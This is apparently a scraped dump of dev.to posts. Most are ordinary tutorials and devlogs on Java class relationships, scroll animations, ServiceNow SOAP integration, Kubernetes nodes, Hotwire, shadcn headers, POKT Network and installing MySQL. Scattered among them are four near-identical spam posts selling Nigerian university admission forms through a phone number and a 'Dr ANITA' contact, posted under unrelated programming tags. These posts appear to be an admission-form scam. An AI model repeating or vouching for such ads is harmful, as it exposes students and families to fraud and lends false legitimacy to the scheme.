Understanding Reactive Contexts in Angular 18 is key to leveraging the power of signals and reactive programming in your applications. Whether through the explicit use of `effect` functions or the implicit Reactive Contexts in templates, Angular provides robust tools to manage state reactivity effectively. By grasping these concepts, you can write more efficient, maintainable, and scalable Angular applications.
| diegoquesadadev |
1,878,540 | Class Relationships | To design classes, you need to explore the relationships among classes. The common relationships... | 0 | 2024-06-05T21:33:08 | https://dev.to/paulike/class-relationships-324b | java, programming, learning, beginners | To design classes, you need to explore the relationships among classes. The common relationships among classes are association, aggregation, composition, and inheritance. This section explores association, aggregation, and composition.
## Association
_Association_ is a general binary relationship that describes an activity between two classes. For example, a student taking a course is an association between the **Student** class and the **Course** class, and a faculty member teaching a course is an association between the **Faculty** class and the **Course** class. These associations can be represented in UML graphical notation, as shown in Figure below.

This UML diagram shows that a student may take any number of courses, a
faculty member may teach at most three courses, a course may have from five to sixty students, and a course is taught by only one faculty member. An association is illustrated by a solid line between two classes with an optional label that describes the relationship. In Figure above, the labels are _Take_ and _Teach_. Each relationship may have an optional small black triangle that indicates the direction of the relationship. In
this figure, the direction indicates that a student takes a course (as opposed to a course taking a student).
Each class involved in the relationship may have a role name that describes the role it plays in the relationship. In Figure above, _teacher_ is the role name for **Faculty**.
Each class involved in an association may specify a _multiplicity_, which is placed at the side of the class to specify how many of the class’s objects are involved in the relationship in UML. A multiplicity could be a number or an interval that specifies how many of the class’s objects are involved in the relationship. The character ***** means an unlimited number of objects, and the interval **m..n** indicates that the number of objects is between **m** and **n**, inclusively. In Figure above, each student may take any number of courses, and each course must have at least five and at most sixty students. Each course is taught by only one faculty member, and a faculty member may teach from zero to three courses per semester.
In Java code, you can implement associations by using data fields and methods. For example, the relationships in Figure above may be implemented using the classes in Figure below.

The relation “a student takes a course” is implemented using the **addCourse** method in the **Student** class and the **addStudent** method in the **Course** class. The relation “a faculty teaches a course” is implemented using the **addCourse** method in the **Faculty** class and the **setFaculty** method in the **Course** class. The **Student** class may use a list to store the courses that the student is taking, the **Faculty** class may use a list to store the courses that the faculty is teaching, and the **Course** class may use a list to store students enrolled in the course and a data field to store the instructor who teaches the course.
There are many possible ways to implement relationships. For example, the student and faculty information in the **Course** class can be omitted, since they are already in the **Student** and **Faculty** class. Likewise, if you don’t need to know the courses a student takes or a faculty member teaches, the data field **courseList** and the **addCourse** method in **Student** or **Faculty** can be omitted.
## Aggregation and Composition
_Aggregation_ is a special form of association that represents an ownership relationship between two objects. Aggregation models has-a relationships. The owner object is called an _aggregating object_, and its class is called an _aggregating class_. The subject object is called an _aggregated object_, and its class is called an _aggregated class_.
An object can be owned by several other aggregating objects. If an object is exclusively owned by an aggregating object, the relationship between the object and its aggregating object is referred to as a _composition_. For example, “a student has a name” is a composition relationship between the **Student** class and the **Name** class, whereas “a student has an address” is an aggregation relationship between the **Student** class and the **Address** class, since an address can be shared by several students. In UML, a filled diamond is attached to an aggregating class (in this case, **Student**) to denote the composition relationship with an aggregated class (**Name**), and an empty diamond is attached to an aggregating class (**Student**) to denote the aggregation relationship with an aggregated class (**Address**), as shown in Figure below.

In Figure above, each student has only one multiplicity—address—and each address can be shared by up to **3** students. Each student has one name, and a name is unique for each student.
An aggregation relationship is usually represented as a data field in the aggregating class. For example, the relationships in Figure above may be implemented using the classes in Figure below. The relation “a student has a name” and “a student has an address” are implemented in the data field **name** and **address** in the **Student** class.

Aggregation may exist between objects of the same class. For example, a person may have a supervisor. This is illustrated in Figure below.

In the relationship “a person has a supervisor,” a supervisor can be represented as a data field in the **Person** class, as follows:
`public class Person {
// The type for the data is the class itself
private Person supervisor;
...
}`
If a person can have several supervisors, as shown in Figure below (a), you may use an array to store supervisors, as shown in Figure below (b).

Since aggregation and composition relationships are represented using classes in the same way, we will not differentiate them and call both compositions for simplicity. | paulike |
1,878,539 | Caritas University, Enugu,2024/2025 Session Admission forms | Caritas University, Enugu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for... | 0 | 2024-06-05T21:31:35 | https://dev.to/admin_dept_202e474d82b68c/caritas-university-enugu20242025-session-admission-forms-1cj1 | web3, vue, flutter | Caritas University, Enugu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,538 | On-Scroll Animation | Hey everyone! I recently worked on a cool feature: on-scroll animations. These animations make your... | 0 | 2024-06-05T21:30:47 | https://dev.to/alikhanzada577/on-scroll-animation-11am | animation, frontend, css, javascript | Hey everyone!
I recently worked on a cool feature: **on-scroll animations**.
These animations make your site more engaging and interactive. I used the Intersection Observer API to achieve this effect, and it was surprisingly easy. Here’s a quick rundown of how I did it.
**HTML**
First, I set up the HTML structure. I created several sections that would animate into view as the user scrolls. Here’s the code:
```
<body>
<section class="hidden">
<h1>Hello Folks!</h1>
<p>On scroll code snippet</p>
</section>
<section class="hidden">
<h2>Tech Stack</h2>
<div class="logos">
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTYk594AhSKw5Eb3iHkPHs_XmpCqaRVgu0mvg&s" alt="logo">
</div>
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ_9-dX6ofdk9qorLSVu4R02VV2StVoC1rboA&s" alt="logo">
</div>
<div class="logo hidden">
<img src="https://logodownload.org/wp-content/uploads/2022/04/javascript-logo-1.png" alt="logo">
</div>
<div class="logo hidden">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThGyyY4OZ3bk3rFDaYtAbHR8htxrLHnjw2nxRL_80Xs7F0KG8-4dgIxP-wtQKFhdyXyvQ&usqp=CAU" alt="logo">
</div>
</div>
</section>
<section class="hidden">
<h2>Front End Engineering</h2>
<p>The things you own end up owning you! It's only after you lose everything that you're free to do anything</p>
</section>
</body>
```
**CSS**
Next, I wrote some CSS to style the sections. The key was to start with the elements hidden and then animate them into view. Here’s what the CSS looks like:
```
body {
background-color: #131316;
color: #ffffff;
font-family: 'Poppins', sans-serif;
padding: 0;
margin: 0;
}
section {
display: grid;
place-items: center;
align-content: center;
min-height: 100vh;
}
.hidden {
opacity: 0;
filter: blur(5px);
transform: translateX(-100%);
transition: all 1s;
}
.show {
opacity: 1;
filter: blur(0);
transform: translateX(0);
}
.logos {
display: flex;
}
.logo {
margin-left: 2px;
margin-right: 2px;
}
.logo img {
height: 100px;
}
.logo:nth-child(2) {
transition-delay: 200ms;
}
.logo:nth-child(3) {
transition-delay: 400ms;
}
.logo:nth-child(4) {
transition-delay: 600ms;
}
```
**JavaScript for Intersection Observer**
The real magic happens with JavaScript. I used the Intersection Observer API to detect when each section comes into view and apply the animation. Here’s the script:
```
document.addEventListener('DOMContentLoaded', () => {
const observer = new IntersectionObserver((entries) => {
entries.forEach((entry) => {
if (entry.isIntersecting) {
entry.target.classList.add('show');
} else {
entry.target.classList.remove('show');
}
});
});
const hiddenElements = document.querySelectorAll('.hidden');
hiddenElements.forEach((el) => observer.observe(el));
});
```
**How It Works**
**HTML**
- I created sections with the class **hidden** which will be animated into view.
**CSS**
- The .hidden class hides the elements initially using opacity, blur, and transform properties.
- The .show class makes the elements visible by resetting these properties.
**JavaScript**
- An **IntersectionObserver** checks if elements are in the viewport.
- When elements come into view, the **show** class is added to make them visible.
And that’s it! With this setup, as you scroll down the page, the hidden sections will smoothly animate into view. This little touch can really enhance the user experience on your site. I had a lot of fun implementing it, and I hope you do too.
**Happy coding!**
Also, Check out this Pen I made!
{% codepen https://codepen.io/Alikhanzada577/pen/pomwNqo %}
| alikhanzada577 |
1,878,537 | Covenant University Ota,2024/2025 Session Admission forms | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:29:57 | https://dev.to/admin_dept_202e474d82b68c/covenant-university-ota20242025-session-admission-forms-4j4l | webdev, beginners | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,536 | Crawford University Igbesa,2024/2025 Session Admission form | Crawford University Igbesa,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:26:18 | https://dev.to/admin_dept_202e474d82b68c/crawford-university-igbesa20242025-session-admission-form-53g3 | webdev, beginners | Crawford University Igbesa,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,535 | Covenant University Ota,2024/2025 Session Admission forms | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the... | 0 | 2024-06-05T21:23:20 | https://dev.to/admin_dept_202e474d82b68c/covenant-university-ota20242025-session-admission-forms-m84 | scrum, javascript | Covenant University Ota,2024/2025 Session Admission forms are on sales.Contact the admin of the school ☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line. The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,345 | Leveraging SOAP APIs for Outbound Integration: A Step-by-Step Guide. | Soap API: Outbound Integration SOAP (Simple Object Access Protocol) is an XML-based... | 0 | 2024-06-05T21:23:05 | https://dev.to/sophiasemga/leveraging-soap-apis-for-outbound-integration-a-step-by-step-guide-245c | webdev, integration, api, tutorial | ##Soap API: Outbound Integration
**SOAP (Simple Object Access Protocol)** is an XML-based messaging protocol used for exchanging information between two applications. It includes a **WSDL** file, which contains the necessary information about what the web service does and the location of the web service.
**WSDL**, also known as Web Service Definition Language, is the format in which data can be represented. All tables and import sets dynamically generate a WSDL XML document that describes the table schema and available operations.
You can obtain a table’s WSDL by using a URL call to your instance that contains the name of the target table and the WSDL parameter `(e.g.,
https://myinstance.servicenow.com/incident.do?WSDL).`
To get started with SOAP, you need a source instance and a target instance (the target instance could be another third-party application or another ServiceNow instance).


####*Use case: Whenever an incident record is created in the source instance, that same record should get inserted/populated in the target instance/application.*#####
We are going to create an inbound integration on the target instance, essentially an import set that will synchronously transform the incoming data **(SOAP message + Basic AUTH)** based on associated transform maps.
#####<u>Web Services > Inbound</u>
`•Label` - Name of Import : Incident demo
`•Name` - Value of name of Import: u_incidentdemo
`•Checkmark <u>Copy fields from target table</u>, because we need all the fields that are in the table`
`•Target Table` - Name of table you’re deriving data from: Incident
###Click Create###

`•Then Click “Automapping Assist” to pull out all the fields from the target table, creating an import set.`

##What Is The Purpose:##
To generate the WSDL URL data of the table. If you type the label name, it’ll come up as a module. Click on it and copy the WSDL URL.

###On to the Source Instance:###
On the source instance, search for SOAP API - SOAP Message. Keep in mind that our source instance is performing the outbound integration because a record is being ‘thrown out’ of the system.
On SOAP Message:
**Click New**

`1•Name:` Name of Soap Message: IncidentDemo
(Naming conventions doesn’t matter)
`2•WSDL:` Date copied from target instance

`3•Authentication Type: Basic`
`4•Basic Auth Profile:` Serves as credentials to authenticate the client( target instance ) by verifying the username and password against its authentication system before processing soap requests.
To get the Basic Auth profile, go to the target instance to get your system administrator username and password. Make sure it’s set or reset it if need be. (`Sys_user.LIST` to access the admin account.)

`•Once username and password has been reset`,
go back to source instance and add it on Basic AUTH profile field, then save form.

`5•Once you save it, you will see a “Generate Sample Soap Messages” related link.` —-this is a no code approach to simply insert requested data without any need for a customization(scripting).

`6•Click on the link,` and it'll download the WSDL of the target instance target table from the URL, generating the Soap methods.
`•Update - to update records.
•getRecords - to get multiple records.
•deleteRecord - to delete a record.
•Insert - to insert a record.
•deleteMultiple - deletes multiple records.
•get- to get a record.`

**Click on the Insert Method**, because we’re going to be inserting a new record on the target instance.
1• Select authentication as Basic and choose the Basic Auth we created.

2•On the envelope field, we see all the fields that make up incident record in an XML file, you can remove fields that aren’t required/ part of requirement.

3•Once done, Save the form.
4•Go to the “<u>Autogenerate Variables</u>” related link on form, which generates variable substitution for all template variables on the envelope/ XML data.
5•Once generated, we are given the option to test,
by providing these variables with test values to validate integration success, before implementing business rule to customize the integration.

6• After given it test values, click on the Test related link, upon testing review the HTTP status to ensure it states: **200**,
meaning testing was successful and integration worked.

###How do we check if the incident record was created/inserted in the target instance?###
Go to the target instance, navigate to the target table (Incident), and check if the test record has been inserted.

Our test record got inserted—great job! You successfully performed SOAP integration. 😊

**However**, our set priority is of a different value because the priority field value is dependent on two other fields (**impact and urgency**). To properly set the priority field value, you have to set values for the impact and urgency fields.
Other than that, you successfully performed a SOAP integration that inserted a new record into another application!
###Check YouTube video here:###
[https://youtu.be/mAOIWpEiTF8?si=AYIke1KphsITk1CP]
To watch the implementation on how to create an after-business rule to always insert a new incident record into the target instance whenever an incident record is created in the source instance.
`PS: Do not ever use the **“Before”** business rule during integration because you don’t want the record to get stored in the target system before the source system.`
####Key things to keep in mind when watching the YouTube video:
We are going to be creating an “After” business rule with the “Insert” operation.
For the advanced field, to set up the code, go back to the SOAP message insert function and click on the “<u>Preview Script Usage</u>” related link, copy the code, preview, and paste it into the business rule advanced field.
###What is the code doing?###
The code is calling the SOAP message we created ‘IncidentDemo’ and the method ‘Insert’ that was used in the SOAP message.
Then it’s setting parameters; the values in our parameters are from our testing, so we will need to replace them with current values.
Once that’s done, save your business rule, and again, by creating a new incident on the source instance, go to your target instance to make sure that it got populated there as well.
PS: It’s very important to keep in mind that only the field values that are being set in the parameter would show up in the target instance.
___________________________________
Thank you for reading and watching! I hope this lesson broke down SOAP integrations properly. To learn more about SOAP, check out these product documentations:
•https://docs.servicenow.com/bundle/tokyo-application-development/page/integrate/inbound-soap/concept/c_SOAPWebService.html
| sophiasemga |
1,878,484 | Kubernetes Worker Node Components | Our article provides an overview of these components and their roles in supporting containerized... | 0 | 2024-06-05T21:19:50 | https://dev.to/giftbalogun/kubernetes-worker-node-components-ihp | Our article provides an overview of these components and their roles in supporting containerized applications in a Kubernetes cluster. To properly understand this article, you should have an understanding of the Kubernetes control plane.
Container runtime is responsible for tasks like pulling images from a repository and isolating resources for containers.
Kubelet acts as the primary node agent, ensuring that containers for the pods assigned to its node are running. It interacts with the container runtime using the Container Runtime Interface (CRI) to manage containerized workloads.
Kube-proxy do handles networking by maintaining network rules for pod communication. It watches Service and Endpoint resources and updates iptables rules for packet routing within the Linux kernel.
Service Resources provide stable IP addresses for connecting to pods, facilitating communication within or outside the clusters. Services work with Endpoints resources to route client requests to the appropriate pods.
Learn more: https://everythingdevops.dev/kubernetes-architecture-explained-worker-nodes-in-a-cluster/ | giftbalogun | |
1,872,328 | Playing around with Hotwire ⚡️ | Hey 👋, Let's jump into my bi-weekly update in the ramen profitability series, where I'm sharing... | 27,288 | 2024-06-05T21:17:15 | https://dev.to/joelzwarrington/playing-around-with-hotwire-2a2a | webdev, javascript, rails | Hey :wave:,
Let's jump into my bi-weekly update in the [ramen profitability series](https://dev.to/joelzwarrington/series/27288), where I'm sharing progress on my latest project: [HomeSuiteApartment](https://homesuiteapartment.com), a tool to manage rental properties.
In this update, I've been focused on the workflow to inquire about units and scheduling viewings, and I touched up the subscription page. Given my current schedule (working fulltime with a 1 year old), I'm pretty happy with what I was able to accomplish in these past two weeks, and am looking forward to setting a open-beta launch date in the next month or two.
## Updating the listing page
I updated the listing page, and have since added a form to submit inquiries and additional messages on-top of the inquiry.

{% youtube HqlNv13deXg %}
Once the inquiry is submitted, the property manager will be able to respond in their inbox, and schedule a viewing.

{% youtube ZuqR0GNJoys %}
As you can see in the example above, I'm using [Turbo Frames](https://turbo.hotwired.dev/) to give a single-page application feel, while not having to write any JavaScript.
Here's a boiled down example of how you can accomplish a view that:
```erb
<%= link_to inquiry, data: { turbo_frame: "inquiry" } %>
<%# this is a placeholder for the selected inquiry %>
<%= turbo_frame_tag "inquiry" %>
```
Now, in your `#show` action, you can simply wrap your item in the turbo frame tag, and instead of following the redirect, Turbo will replace the frame with id `inquiry` from the response.
```erb
<%= turbo_frame_tag "inquiry" do %>
<%= turbo_frame_tag inquiry do %>
<p>This is an inquiry!</p>
<% end %>
<% end %>
```
A major benefit to this, is that if you want to implement single-page application-like features, all you need to do is use a few custom HTML elements, and some data-attributes. So if you're a Ruby on Rails developer, you really won't need to do much to decompose your views into frames.
You can use [Turbo Frames](https://turbo.hotwired.dev/handbook/frames) on form submission using [Turbo Streams](https://turbo.hotwired.dev/handbook/streams). [Turbo Streams](https://turbo.hotwired.dev/handbook/streams) allow you to modify [Turbo Frames](https://turbo.hotwired.dev/handbook/frames) very precisely with these actions: _append_, _prepend_, (insert) _before_, (insert) _after_, _replace_, _update_, _remove_, and _refresh_.
In my example, when I submit a new message to the inquiry, I'm appending the message to the list, and also am clearing out the message form. Similar to decomposing with [Turbo Frames](https://turbo.hotwired.dev/handbook/frames), you're only ever sprinkling in things as needed, and you don't need to add any boilerplate up-front.
Most of your controllers still function as normal Ruby on Rails controllers using redirects, but when you need the extra functionality, or want to speed up page loads, you can use [Turbo Streams](https://turbo.hotwired.dev/handbook/streams).
I highly recommend checking out [Hotwire](https://hotwired.dev/), it's really been a breath of fresh air for me. You get to do a lot more with less JavaScript, and allows you to get the same benefits as other frameworks/libraries (such as react) without having to significantly change your development process.
If you're interested, you should have a look at the [Hotrails tutorial](https://www.hotrails.dev/) which goes over all of the concepts introduced by Turbo and Stimulus.
## Subscriptions
In the last update, I got subscriptions working, and integrated with [Stripe](https://stripe.com). I'm using the [Pay gem](https://github.com/pay-rails/pay) to manage the subscriptions, as it provides a lot of built-in functionality, and the [Stripe Ruby Client](https://github.com/stripe/stripe-ruby) for other API calls not supported with the [Pay gem](https://github.com/pay-rails/pay).
In this update, I went ahead and fleshed out the page with pricing and features. So we started with this:

and, ended with this:

I won't take credit for the re-design though. If you're using the [Tailwind CSS Library](https://tailwindcss.com/) you should checkout [Tailwind UI](https://tailwindui.com/). It's helped me scaffold a few components and pages quite easily, without having a designer onboard.
## What's next!
- Further improving the viewing + inquiry pages
- Improve the unit to listing workflow
See you in two weeks! | joelzwarrington |
1,878,482 | Shadcn/ui codebase analysis: site-header.tsx explained. | I wanted to find out how the header is developed on ui.shadcn.com, so I looked at its source code.... | 0 | 2024-06-05T21:15:44 | https://dev.to/ramunarasinga/shadcnui-codebase-analysis-site-headertsx-explained-4l3k | javascript, nextjs, opensource, shadcnui | I wanted to find out how the header is developed on [ui.shadcn.com](http://ui.shadcn.com), so I looked at its [source code](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx). Because shadcn-ui is built using app router, the files I was interested in were [Layout.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx) and [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx).
In this article, we will find out the below items:
1. Where is the code related to the header section shown in the image below?

2\. Header code snippet
3\. Components used in Header
> _Want to learn how to build shadcn-ui/ui from scratch? Check out_ [_build-from-scratch_](https://github.com/Ramu-Narasinga/build-from-scratch) _and give it a star if you like it. Sovle challenges to build shadcn-ui/ui from scratch. If you are stuck or need help?_ [_solution is available_](https://tthroo.com/build-from-scratch)_._
Where is the code related to the header section?
------------------------------------------------
layout.tsx has the code below

As you can see SiteHeader component is in AppLayout and [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx#L14) has the code related to header section.
Header code snippet
-------------------
The code below is from [site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx)
```
import Link from "next/link"
import { siteConfig } from "@/config/site"
import { cn } from "@/lib/utils"
import { CommandMenu } from "@/components/command-menu"
import { Icons } from "@/components/icons"
import { MainNav } from "@/components/main-nav"
import { MobileNav } from "@/components/mobile-nav"
import { ModeToggle } from "@/components/mode-toggle"
import { buttonVariants } from "@/registry/new-york/ui/button"
export function SiteHeader() {
return (
<header className="sticky top-0 z-50 w-full border-b border-border/40 bg-background/95 backdrop-blur supports-\[backdrop-filter\]:bg-background/60">
<div className="container flex h-14 max-w-screen-2xl items-center">
<MainNav />
<MobileNav />
<div className="flex flex-1 items-center justify-between space-x-2 md:justify-end">
<div className="w-full flex-1 md:w-auto md:flex-none">
<CommandMenu />
</div>
<nav className="flex items-center">
<Link
href={siteConfig.links.github}
target="\_blank"
rel="noreferrer"
>
<div
className={cn(
buttonVariants({
variant: "ghost",
}),
"w-9 px-0"
)}
>
<Icons.gitHub className="h-4 w-4" />
<span className="sr-only">GitHub</span>
</div>
</Link>
<Link
href={siteConfig.links.twitter}
target="\_blank"
rel="noreferrer"
>
<div
className={cn(
buttonVariants({
variant: "ghost",
}),
"w-9 px-0"
)}
>
<Icons.twitter className="h-3 w-3 fill-current" />
<span className="sr-only">Twitter</span>
</div>
</Link>
<ModeToggle />
</nav>
</div>
</div>
</header>
)
}
```
[MainNav component](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/examples/dashboard/components/main-nav.tsx) is responsible for the section below

[MobileNav component](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16) is responsible for the section below

[Command menu.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/command-menu.tsx#L28) is responsible for the search functionality below

[ModeToggle.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15) is responsible for the element shown below

About me:
---------
Website: [https://ramunarasinga.com/](https://ramunarasinga.com/)
Linkedin: [https://www.linkedin.com/in/ramu-narasinga-189361128/](https://www.linkedin.com/in/ramu-narasinga-189361128/)
Github: [https://github.com/Ramu-Narasinga](https://github.com/Ramu-Narasinga)
Email: [ramu.narasinga@gmail.com](mailto:ramu.narasinga@gmail.com)
References:
-----------
1. [https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/app/(app)/layout.tsx)
2. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/site-header.tsx)
3. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mode-toggle.tsx#L15)
4. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/main-nav.tsx](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/main-nav.tsx)
5. [https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16](https://github.com/shadcn-ui/ui/blob/main/apps/www/components/mobile-nav.tsx#L16) | ramunarasinga |
1,878,481 | Babylon.js Browser MMO - DevLog- Update #6 - Character UI | Hi! Today I was working on the UI. I fixed player name text (it's not mirror reflected anymore). I... | 0 | 2024-06-05T21:12:42 | https://dev.to/maiu/babylonjs-browser-mmo-devlog-update-6-character-ui-o23 | babylonjs, gamedev, indie, mmo | Hi!
Today I was working on the UI. I fixed player name text (it's not mirror reflected anymore). I added tooltip with name and class while hoovering over players. And added ability Panel for skills and some actions like character stats, inventory etc.
Hope You like it!
{% youtube 3vzId1DzR5g %} | maiu |
1,878,479 | POKT NETWORK ACTORS | In the social media world, our attention to content is revenue for the company. In a blockchain... | 27,614 | 2024-06-05T21:10:21 | https://paragraph.xyz/@pokt-hub/pokt-network-actors | shannonupgrade, testnet, rpc, web3 | In the social media world, our attention to content is revenue for the company. In a blockchain world, the blocks are revenue for the chain.
As a company shares its revenue among shareholders, employees and investors, blockchain revenue is generally shared among the contributors of the block.
> In most chains,block contributors are, the demand side, the supply side and the DAO.
- Demand side makes it possible for the user to consume whatever services the chain is offering.
- The supply side does the same by ensuring the data produced from the activity of consuming the service is stored in a manner that is easy to retrieve.
While the DAO, coordinates all activities ensuring they are beneficial to everyone.
> POKT Network, a simple yet powerful protocol that is your API to the open internet.
In the most efficient manner, POKT Network coordinates the movement of data from over 60 blockchains to their destination at low latency and high uptime using Remote Procedure Calls(RPC).
POKT Network’s revenue is brought in by gateways who represent the demand side and shared between the DAO and the Node runners, who represent the supply side.
As we have come to learn in blockchains, revenue is earned only when work is done. This means there are different elements that work together to do the work, generally called actors.
In the upcoming Shannon upgrade, work is done by 5 actors, each with its own responsibilities.
They all together seek to enable permissionless demand, where anyone unrestricted can use POKT to consume RPCs, revamp the tokenomics and provide opportunities to build exciting products that are not supported in the current version.
Let’s learn more about these actors and understand what they do.
[POKT Network](https://www.pokt.network/)
## Applications
POKT application actor enable the gateways to sign and relay transactions.
Gateways have to stake an application to serve RPC requests to their customers. Staking an application takes two parameters:
- service_ids - This represents the chains whose relays the application needs, generally the service offered by POKT Network that the application consumes.
- stake_amount - This is an amount in upokt that the gateway has staked in order to relay requests to POKT Network on behalf of Applications.
Upon Shannon upgrade, staking an application through running a gateway will be permissionless.
See the docs https://dev.poktroll.com/protocol/actors/application
## Gateways
Gateway actor in POKT Network are a first class citizen who live onchain.
https://dev.poktroll.com/protocol/actors/gateway
With gateways being such an integral part of POKT network, a lightweight gateway server that allows anyone to spin up a gateway and start serving requests is available and requires at least 4 vCPUs+, 1GB RAM, and 1GB Storage.
If you would like to contribute or try the Gateway Server, see docs below.
https://docs.pokt.network/gateways/host-a-gateway
> The gateway server makes it easier to interact with the onchain gateway actor.
## Supplier
Suppliers are an onchain actor. They stake their POKT to earn POKT in exchange for providing services.
They are node runners who serve the relays requested by the applications.
At the protocol level, they are supported by two onchain modules :-
- Supplier module - This module covers the staking, unstaking and supplier querying transactions.
- Proof module - This is the ‘work’ module, it is responsible for claims creation and querying besides the submission and querying of proofs.
You can learn more about Supplier actors from the official docs.
https://dev.poktroll.com/protocol/actors/supplier
> The above 3 actors Applications, Gateways and Suppliers reside onchain.
## AppGate Server
AppGate Server is responsible for relaying a request from the client’s dApp to the supplier of the requested service.
Executing the logic of a relay from the moment it leaves the client’s dApp to when it gets to the supplier.
To put it into perspective, a Polygon wallet service that is under-DePIN-ed by POKT Network would require a Gateway to provide polygon endpoints that the wallet would then use to send requests to the POKT Network.
The Gateway in this case would require an Application to be staked in order to sign and send requests on its behalf.
To customize the business logic such that free tier is capped at 1,000,000 requests per month, this logic is implemented within AppGate Server.
> This actor is utilized and consumed by the onchain Gateway Actor.
See the docs https://dev.poktroll.com/protocol/actors/appgate_server
## RelayMiner
It provides the ability for individuals to offer services through POKT Network alongside a staked Supplier.
All Suppliers providing services on POKT Network have to run a relay miner alongside the software that is providing the service, as an example a node runner serving Polygon relays needs to have access to a Polygon node alongside a POKT node to serve Polygon relays on POKT Network.
Through this actor, POKT Network supports non-custodial staking, since it is responsible for proxying relay requests between an AppGate Server and the supplied service.
This actor is utilized and consumed by the Supplier Actor.
Learn more at https://dev.poktroll.com/protocol/actors/relay_miner
The above two actors Relayminer and Appgate server reside offchain.
## Conclusion
> POKT Network is an important piece of infrastructure for Web3 with no comparison, both centralized and decentralized.
To give an overview of how POKT Network has managed to achieve high uptime, cost-effectiveness and low latency in RPC, this is how it happens.
The client’s dApp interacts with the Gateways through endpoints.
Gateways interact with the staked Applications, enabling them to relay requests on their behalf to the protocol.
Once at the protocol level, the RelayMiner run by the Supplier receives the relay request and proxies it to the required service.
It is worth noting, for the RelayMiner to run, it requires a staked Supplier which is a staked POKT Node.
Supplier A serving requests for the Polygon wallet service discussed earlier, would require a POKT Node running so that the RelayMiner can receive relay requests and proxy them to the Polygon node.
How the interaction of all the actors of the protocol happens is a topic we will keep exploring.
_Until next time, Stay POKT._
| pokthub |
1,878,477 | Step-by-step guide for how to install an SQL server on Ubuntu 22.04 | Step-by-step guide for how to install an SQL server on Ubuntu 22.04 Installing... | 0 | 2024-06-05T21:06:43 | https://dev.to/oyololatoni/step-by-step-guide-for-how-to-install-an-sql-server-on-ubuntu-2204-2ahk | mysql, linux, ubuntu, devops |
## Step-by-step guide for how to install an SQL server on Ubuntu 22.04

## **Installing the SQL server**
Firstly update your desktop and install the SQL server
sudo apt-get update
sudo apt-get install mysql-server
Verify that the server is running with the following command
sudo systemctl start mysql.service
sudo systemctl status mysql.service
The result should look like this:

## Configure MySQL
